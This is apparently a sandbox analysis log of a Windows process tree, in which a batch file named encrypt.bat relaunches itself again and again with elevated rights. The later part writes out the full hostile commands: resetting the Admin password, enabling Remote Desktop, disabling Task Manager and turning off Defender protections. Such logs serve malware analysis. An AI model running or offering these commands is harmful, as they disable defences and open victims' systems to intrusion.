        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        9⤵
        
        PID:4816
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:4764
        
        C:\Windows\system32\net.exe
        
        net session
        10⤵
        
        PID:4924
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        11⤵
        
        PID:2972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        10⤵
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1736
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        11⤵
        
        PID:5248
        
        C:\Windows\system32\net.exe
        
        net session
        12⤵
        
        PID:5440
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        13⤵
        
        PID:5464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        12⤵
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5492
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        13⤵
        
        PID:5724
        
        C:\Windows\system32\net.exe
        
        net session
        14⤵
        
        PID:5948
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        15⤵
        
        PID:5984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        14⤵
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6024
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        15⤵
        
        PID:4984
        
        C:\Windows\system32\net.exe
        
        net session
        16⤵
        
        PID:5412
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        17⤵
        
        PID:5444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        16⤵
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4624
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        17⤵
        
        PID:6132
        
        C:\Windows\system32\net.exe
        
        net session
        18⤵
        
        PID:5232
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        19⤵
        
        PID:5200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        18⤵
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5412
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        19⤵
        
        PID:960
        
        C:\Windows\system32\net.exe
        
        net session
        20⤵
        
        PID:5656
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        21⤵
        
        PID:5912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        20⤵
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:5784
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        21⤵
        
        PID:5392
        
        C:\Windows\system32\net.exe
        
        net session
        22⤵
        
        PID:4080
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        23⤵
        
        PID:6088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        22⤵
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:3524
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        23⤵
        
        PID:5500
        
        C:\Windows\system32\net.exe
        
        net session
        24⤵
        
        PID:5440
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        25⤵
        
        PID:5336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        24⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5716
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        25⤵
        
        PID:5148
        
        C:\Windows\system32\net.exe
        
        net session
        26⤵
        
        PID:5804
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        27⤵
        
        PID:6160
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        26⤵
        
        PID:6200
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        27⤵
        
        PID:6552
        
        C:\Windows\system32\net.exe
        
        net session
        28⤵
        
        PID:6792
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        29⤵
        
        PID:6808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        28⤵
        
        PID:6864
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        29⤵
        
        PID:3448
        
        C:\Windows\system32\net.exe
        
        net session
        30⤵
        
        PID:6992
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        31⤵
        
        PID:6960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        30⤵
        
        PID:7040
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        31⤵
        
        PID:6940
        
        C:\Windows\system32\net.exe
        
        net session
        32⤵
        
        PID:6648
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        33⤵
        
        PID:6360
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        32⤵
        
        PID:5712
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        33⤵
        
        PID:6104
        
        C:\Windows\system32\net.exe
        
        net session
        34⤵
        
        PID:6284
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        35⤵
        
        PID:6204
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        34⤵
        
        PID:6980
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        35⤵
        
        PID:6392
        
        C:\Windows\system32\net.exe
        
        net session
        36⤵
        
        PID:6384
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        37⤵
        
        PID:6168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        36⤵
        
        PID:6428
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        37⤵
        
        PID:6432
        
        C:\Windows\system32\net.exe
        
        net session
        38⤵
        
        PID:6896
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        39⤵
        
        PID:6224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        38⤵
        
        PID:6816
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        39⤵
        
        PID:784
        
        C:\Windows\system32\net.exe
        
        net session
        40⤵
        
        PID:5760
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        41⤵
        
        PID:6620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        40⤵
        
        PID:6972
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        41⤵
        
        PID:6808
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        42⤵
        
        PID:5324
        
        C:\Windows\system32\net.exe
        
        net session
        42⤵
        
        PID:7120
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        43⤵
        
        PID:6716
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        42⤵
        
        PID:5492
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        43⤵
        
        PID:6540
        
        C:\Windows\system32\net.exe
        
        net session
        44⤵
        
        PID:5480
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        45⤵
        
        PID:7052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        44⤵
        
        PID:6056
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        45⤵
        
        PID:5984
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        46⤵
        
        PID:5156
        
        C:\Windows\system32\net.exe
        
        net session
        46⤵
        
        PID:5648
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        47⤵
        
        PID:4048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        46⤵
        
        PID:5656
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        47⤵
        
        PID:7024
        
        C:\Windows\system32\net.exe
        
        net session
        48⤵
        
        PID:2888
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        49⤵
        
        PID:6396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        48⤵
        
        PID:5948
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        49⤵
        
        PID:7416
        
        C:\Windows\system32\net.exe
        
        net session
        50⤵
        
        PID:7740
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        51⤵
        
        PID:7784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        50⤵
        
        PID:8052
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        51⤵
        
        PID:7020
        
        C:\Windows\system32\net.exe
        
        net session
        52⤵
        
        PID:7716
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        53⤵
        
        PID:7724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        52⤵
        
        PID:8036
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        53⤵
        
        PID:1892
        
        C:\Windows\system32\net.exe
        
        net session
        54⤵
        
        PID:5536
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        55⤵
        
        PID:7544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        54⤵
        
        PID:4804
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        55⤵
        
        PID:5504
        
        C:\Windows\system32\net.exe
        
        net session
        56⤵
        
        PID:5292
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        57⤵
        
        PID:6172
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        56⤵
        
        PID:6736
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        57⤵
        
        PID:7316
        
        C:\Windows\system32\net.exe
        
        net session
        58⤵
        
        PID:7308
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        59⤵
        
        PID:6760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        58⤵
        
        PID:5816
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        59⤵
        
        PID:5624
        
        C:\Windows\system32\net.exe
        
        net session
        60⤵
        
        PID:6768
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        61⤵
        
        PID:7448
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        60⤵
        
        PID:5700
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        61⤵
        
        PID:7540
        
        C:\Windows\system32\net.exe
        
        net session
        62⤵
        
        PID:6980
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        63⤵
        
        PID:6576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        62⤵
        
        PID:4404
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        63⤵
        
        PID:6652
        
        C:\Windows\system32\net.exe
        
        net session
        64⤵
        
        PID:1572
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        65⤵
        
        PID:5204
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        64⤵
        
        PID:7796
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        65⤵
        
        PID:7484
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        66⤵
        
        PID:6008
        
        C:\Windows\system32\net.exe
        
        net session
        66⤵
        
        PID:7740
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        67⤵
        
        PID:7536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        66⤵
        
        PID:7536
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        67⤵
        
        PID:6928
        
        C:\Windows\system32\net.exe
        
        net session
        68⤵
        
        PID:5576
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        69⤵
        
        PID:6868
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        68⤵
        
        PID:3712
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        69⤵
        
        PID:8604
        
        C:\Windows\system32\net.exe
        
        net session
        70⤵
        
        PID:8928
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        71⤵
        
        PID:8988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        70⤵
        
        PID:9136
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        71⤵
        
        PID:1552
        
        C:\Windows\system32\net.exe
        
        net session
        72⤵
        
        PID:8612
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        73⤵
        
        PID:7656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        72⤵
        
        PID:6292
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        73⤵
        
        PID:9048
        
        C:\Windows\system32\net.exe
        
        net session
        74⤵
        
        PID:5816
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        75⤵
        
        PID:8796
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        74⤵
        
        PID:6384
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        75⤵
        
        PID:9008
        
        C:\Windows\system32\net.exe
        
        net session
        76⤵
        
        PID:7968
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        77⤵
        
        PID:7764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        76⤵
        
        PID:4680
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        77⤵
        
        PID:8656
        
        C:\Windows\system32\net.exe
        
        net session
        78⤵
        
        PID:6576
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        79⤵
        
        PID:7704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        78⤵
        
        PID:8508
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        79⤵
        
        PID:8940
        
        C:\Windows\system32\net.exe
        
        net session
        80⤵
        
        PID:5412
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        81⤵
        
        PID:7892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        80⤵
        
        PID:8952
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        81⤵
        
        PID:8320
        
        C:\Windows\system32\net.exe
        
        net session
        82⤵
        
        PID:5868
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        83⤵
        
        PID:7784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        82⤵
        
        PID:7784
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        83⤵
        
        PID:9096
        
        C:\Windows\system32\net.exe
        
        net session
        84⤵
        
        PID:8772
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        85⤵
        
        PID:8836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        84⤵
        
        PID:8968
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        85⤵
        
        PID:8892
        
        C:\Windows\system32\net.exe
        
        net session
        86⤵
        
        PID:8820
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        87⤵
        
        PID:8880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        86⤵
        
        PID:3712
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        87⤵
        
        PID:7296
        
        C:\Windows\system32\net.exe
        
        net session
        88⤵
        
        PID:6952
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        89⤵
        
        PID:6976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        88⤵
        
        PID:9536
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        89⤵
        
        PID:4624
        
        C:\Windows\system32\net.exe
        
        net session
        90⤵
        
        PID:8664
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        91⤵
        
        PID:9524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        90⤵
        
        PID:9912
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        91⤵
        
        PID:7916
        
        C:\Windows\system32\net.exe
        
        net session
        92⤵
        
        PID:6352
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        93⤵
        
        PID:6752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        92⤵
        
        PID:3824
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Encrypt\encrypt.bat"
        93⤵
        
        PID:7512
        
        C:\Windows\system32\net.exe
        
        net session
        94⤵
        
        PID:6308
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        95⤵
        
        PID:9440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Encrypt\encrypt.bat' -Verb RunAs"
        94⤵
        
        PID:7188
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        94⤵
        
        PID:9972
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        95⤵
        
        PID:6152
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        94⤵
        
        PID:9584
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        94⤵
        
        PID:3688
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        94⤵
        
        PID:5792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        94⤵
        
        PID:5760
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        92⤵
        
        PID:8664
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        93⤵
        
        PID:9236
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        92⤵
        
        PID:9724
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        92⤵
        
        PID:9500
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        92⤵
        
        PID:9088
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        92⤵
        
        PID:9056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        92⤵
        
        PID:8476
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        90⤵
        
        PID:4808
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        91⤵
        
        PID:9384
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        90⤵
        
        PID:932
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        90⤵
        
        PID:6812
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        90⤵
        
        PID:9124
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        90⤵
        
        PID:5428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        90⤵
        
        PID:7700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        90⤵
        
        PID:8980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
        90⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8692
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        88⤵
        
        PID:10124
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        89⤵
        
        PID:7272
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        88⤵
        
        PID:6696
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        88⤵
        
        PID:2120
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        88⤵
        
        PID:3540
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        88⤵
        
        PID:1692
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        88⤵
        
        PID:10196
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        88⤵
        
        PID:9180
        
        C:\Windows\system32\net.exe
        
        net user Admin D34TH
        86⤵
        
        PID:8044
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user Admin D34TH
        87⤵
        
        PID:9376
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
        86⤵
        
        PID:1632
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
        86⤵
        
        PID:6836
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
        86⤵
        
        PID:6180
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
        86⤵
        
        PID:8416
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        86⤵
        
        PID:9144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
        86⤵
        
        PID:8144
        
        C:\Windows\system32\net.exe
        
